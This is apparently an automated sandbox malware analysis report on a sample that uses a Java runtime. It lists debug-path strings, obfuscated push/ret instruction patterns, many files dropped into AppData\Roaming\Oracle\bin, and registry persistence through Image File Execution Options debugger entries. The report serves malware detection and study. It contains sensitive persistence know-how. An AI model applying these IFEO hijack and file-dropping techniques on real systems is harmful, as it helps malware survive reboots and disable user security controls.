Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjfr\jfr.pdb source: xcopy.exe, 00000015.00000003.1714657743.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\a01\_work\38\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: xcopy.exe, 00000015.00000003.1743585507.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: xcopy.exe, 00000015.00000003.1742568613.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libdt_socket\dt_socket.pdb source: xcopy.exe, 00000015.00000003.1709635619.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libt2k\t2k.pdb source: xcopy.exe, 00000015.00000003.1742568613.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb,,+ source: xcopy.exe, 00000015.00000003.1712140938.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb## source: xcopy.exe, 00000015.00000003.1732774705.000000000348F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdbP8PP@Y source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.000000000466E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004643000.00000004.00000800.00020000.00000000.sdmp
Binary contains a suspicious time stamp
Source: msvcp140.dll.21.dr Static PE information: 0xEDEDFA22 [Fri Jun 29 08:17:38 2096 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73AC45FB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 6_2_73AC45FB
PE file contains sections with non-standard names
Source: unpack200.exe.21.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_01F8B947 push 00000000h; mov dword ptr [esp], esp 2_2_01F8B96D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_01F8B3B7 push 00000000h; mov dword ptr [esp], esp 2_2_01F8B3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_01F8BB67 push 00000000h; mov dword ptr [esp], esp 2_2_01F8BB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_01F8A21B push ecx; ret 2_2_01F8A225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_01F8A20A push ecx; ret 2_2_01F8A21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_01F8C477 push 00000000h; mov dword ptr [esp], esp 2_2_01F8C49D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73AC2E75 push ecx; ret 6_2_73AC2E88
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_02F4D8F7 push 00000000h; mov dword ptr [esp], esp 6_2_02F4D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_02F4A21B push ecx; ret 6_2_02F4A225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_02F4A20A push ecx; ret 6_2_02F4A21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_02F4B3B7 push 00000000h; mov dword ptr [esp], esp 6_2_02F4B3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_02F4BB67 push 00000000h; mov dword ptr [esp], esp 6_2_02F4BB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_02F4D8E0 push 00000000h; mov dword ptr [esp], esp 6_2_02F4D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_02F4B947 push 00000000h; mov dword ptr [esp], esp 6_2_02F4B96D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_02F4C477 push 00000000h; mov dword ptr [esp], esp 6_2_02F4C49D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_02FE8A11 push cs; retf 6_2_02FE8A31
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_02FF2488 push es; retn 0024h 6_2_02FF248B
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_02FED5EC push es; retn 0001h 6_2_02FED6FF
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 7_3_14D271E7 push F014D0F0h; iretd 7_3_14D271FD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 7_3_14D26293 push 3014D0F0h; ret 7_3_14D262FD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 7_3_14D27098 push 5814D270h; retf 7_3_14D2709D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 7_3_14D27398 push 3814D273h; iretd 7_3_14D2739D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 7_2_0246D8F7 push 00000000h; mov dword ptr [esp], esp 7_2_0246D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 7_2_0246A20A push ecx; ret 7_2_0246A21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 7_2_0246A21B push ecx; ret 7_2_0246A225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 7_2_0246BB67 push 00000000h; mov dword ptr [esp], esp 7_2_0246BB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 7_2_0246B3B7 push 00000000h; mov dword ptr [esp], esp 7_2_0246B3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 7_2_0246D8E0 push 00000000h; mov dword ptr [esp], esp 7_2_0246D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 7_2_0246B947 push 00000000h; mov dword ptr [esp], esp 7_2_0246B96D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 7_2_0246C477 push 00000000h; mov dword ptr [esp], esp 7_2_0246C49D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 7_2_0250C23B push cs; retf 7_2_0250C2B1
Drops PE files
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\awt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_1.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\java.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-2-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\verify.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\management.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\zip.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_2.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\java.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\vcruntime140.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\net.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2gss.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\vcruntime140.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\sspi_bridge.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\ucrtbase.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll Jump to dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe File created: C:\Users\user\AppData\Local\Temp\Windows266478547194213581.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcp140.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dll Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\README.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt

Boot Survival
barindex
Creates a Image File Execution Options (IFEO) Debugger entry
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Creates an undocumented autostart registry key
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe debugger
